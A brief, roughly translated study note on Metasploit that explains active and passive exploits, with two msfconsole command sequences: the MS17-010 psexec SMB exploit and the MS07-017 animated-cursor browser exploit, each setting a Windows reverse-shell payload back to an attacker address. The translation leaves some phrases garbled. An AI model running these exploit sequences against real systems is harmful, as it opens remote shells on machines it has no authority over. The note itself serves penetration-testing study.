Learn Metasploit again
The Metasploit I studied before was forgotten without writing notes. This time it is called the complete learning content.
1. Active Exploit
- Some kind of server open port, the attacker actively initiates the exploit code, such as bounce shell code execution, get the target shell
- The initiative is to actively initiate the exploit code
Demo
-
command
use exploit/windows/smb/ms17_010_psexec set RHOST 192.168.1.100 //目标ip set PAYLOAD windows/shell/reverse_tcp //一个反弹的shell set LHOST 192.168.1.1 //要反弹的那个ip set LPORT 4444 set SMBUSER 系统用户名 set SMBPASS 系统密码 exploit
2. Passive Exploit
- The attacked person does not have vulnerabilities. The vulnerabilities exist in the client software, the client accesses services on the remote server side, there are vulnerability exploit codes on the server side, and there are loopholes in the client program, causing the client vulnerabilities to be exploited
-
command
use exploit/windows/browser/ms07_017_ani_loadimage_chunksize set SRVHOST 192.168.0.109 //自己的ip set PAYLOAD windows/shell/reverse_tcp //目标访问我的web一个反弹的shell set LHOST 192.168.1.1 //要反弹的那个ip set PORT 4444 exploit
Launched the
target access vulnerability and triggered
a shell connection